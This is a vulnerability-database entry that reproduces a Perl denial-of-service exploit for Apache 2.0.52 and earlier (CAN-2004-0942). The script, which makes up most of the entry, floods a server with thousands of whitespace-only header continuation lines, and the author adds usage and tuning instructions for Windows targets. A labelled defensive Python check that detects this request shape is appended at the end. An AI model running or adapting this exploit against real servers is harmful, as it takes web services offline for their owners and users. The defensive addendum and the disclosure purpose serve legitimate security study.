seebug | Root | SSV:63025
History: Jul 01, 2014 - 12:00 a.m.

Apache <= 2.0.52 HTTP GET request Denial of Service Exploit


EPSS: 0.966 (High)
Percentile: 99.6%

No description provided by source.


#!/usr/bin/perl

# Based on ->
#             apache-squ1rt.c exploit.
#
#             Original credit goes to Chintan Trivedi on the
#             FullDisclosure mailing list:
#             http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#
#             http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
#             Added a feature with which we can exploit Apache web servers on Windows systems. For it you should experiment
#             with the [trys] parameter of this code.
#
#             By default the parameter trys = 8000; to DoS Apache web servers on Windows systems, try to
#             increase this parameter.
#
#             For example: on my system I have 256Mb of RAM. To DoS Apache web servers I run this exploit like this
#
#             C:\perl ap2.0.52_dos.pl 127.0.0.1 30000
#
#              <+> Prepare to start connect.
#              <+> Connected to 127.0.0.1
#              <+> Send of first part of devil header.
#              <+> Prepare to DoS with 10000 trys.
#              <+> Start DoS second part of devil header.
#              <SOD> |====================> <EOD>
#              <+> Ok now target web server maybe DoSeD.
#
#
# Note ->
#
#             If the progress bar does not respond, the server may already be DoSeD. Try to open a web page hosted on this web server.
#             And if you see "Error 500" you are a lucky man :)
#
# Warnings ->
#             This is POC code; you can use it only on your own servers. The writer is not responsible if you damage your servers or
#             use it for attack, or other things.
#
# Shit ->
#             My English is bullshit right now :( I am trying to study it :)
#

# Tested under Windows 2000 SP4 with Apache 2.0.49 (Win)

# Greets fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.

# Contact me at greenwood3[AT]yandex[dot]ru

use IO::Socket;

if (@ARGV < 1)
  {
   print "\n ::: ---------------------------------------------- :::\n";
   print " ::: Another yet DoS exploit for Apache <= 2.0.52   :::\n";
   print " ::: Usage:  ap2.0.52_dos.pl <ip> [trys]            :::\n";
   print " ::: Coded by GreenwooD from Network Security Team  :::\n";
   print " ::: ---------------------------------------------- :::\n";
   exit();
  }

print "\n <+> Prepare to start connect.\n";

$s = IO::Socket::INET->new(Proto=>"tcp",
                            PeerAddr=>$ARGV[0],
                            PeerPort=>80,
                            Timeout=>6
                            ) or die " <-> Target web server already DoSeD ??? or can't connect :(\n";
  $s->autoflush();

print " <+> Connected to $ARGV[0]\n";
print " <+> Send of first part of devil header.\n";

  print $s "GET / HTTP/1.0\n";

$trys = 8000; # Default

if ($ARGV[1])
{
  $trys = $ARGV[1];
}

print " <+> Prepare to DoS with $trys trys.\n";
print " <+> Start DoS send second part of devil header.\n";
print " <SOD> |";

$i=0;

 do {

     print $s (" " x 8000 . "\n");


      if ($i % 500 == 0)
        {
         print "=";
        }

     ++$i;

    } until ($i == $trys);


print "> <EOD>\n";

close($s);

print " <+> Ok now target web server maybe DoSeD.\n";

# milw0rm.com [2005-03-04]
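
Added example (not part of the original listing, and not Apache's code): a defender-side streaming check for the request shape the script above sends, a request line followed by many whitespace-only continuation lines. The names inspect_head and chunked and all thresholds are assumptions chosen for illustration; in Apache itself the related limits are the LimitRequestLine, LimitRequestFieldSize and LimitRequestFields directives.

```python
# Added defensive example; thresholds are illustrative assumptions, not Apache defaults.
MAX_LINE = 8190       # longest single line accepted, in bytes
MAX_WS_FOLDS = 4      # whitespace-only continuation lines tolerated
MAX_HEAD = 64 * 1024  # total bytes accepted before the blank line

def inspect_head(chunks, max_line=MAX_LINE, max_ws_folds=MAX_WS_FOLDS,
                 max_head=MAX_HEAD):
    """Scan a request head as it arrives; return (verdict, bytes_seen).

    Only the current partial line is buffered, so the sender cannot make
    the inspector itself hold an unbounded header in memory.
    """
    line = bytearray()
    seen = ws_folds = lines = 0
    for chunk in chunks:
        for byte in chunk:
            seen += 1
            if seen > max_head:
                return "head_too_large", seen
            if byte != 0x0A:                  # not LF: extend current line
                line.append(byte)
                if len(line) > max_line:
                    return "line_too_long", seen
                continue
            text = bytes(line).rstrip(b"\r")  # accept LF and CRLF endings
            line.clear()
            lines += 1
            if not text:                      # blank line ends the head
                return "ok", seen
            # After the request line, a line holding only SP/HTAB is a
            # header continuation that carries no data.
            if lines > 1 and not text.strip(b" \t"):
                ws_folds += 1
                if ws_folds > max_ws_folds:
                    return "whitespace_fold_flood", seen
    return "incomplete", seen

def chunked(data, size=1024):
    """Split constructed sample bytes the way socket reads would arrive."""
    return (data[i:i + size] for i in range(0, len(data), size))

# Constructed samples: a normal request with one legitimate folded header, and
# the request shape from the listing (8000-space lines), cut to 20 lines.
NORMAL = b"GET / HTTP/1.0\r\nHost: example.test\r\nX-Note: a\r\n b\r\n\r\n"
FLOOD = b"GET / HTTP/1.0\n" + (b" " * 8000 + b"\n") * 20

if __name__ == "__main__":
    print(inspect_head(chunked(NORMAL)))
    print(inspect_head(chunked(FLOOD)))
```

The flood sample is rejected on its fifth whitespace-only line, before the rest of the stream is read, while a folded header that carries data passes.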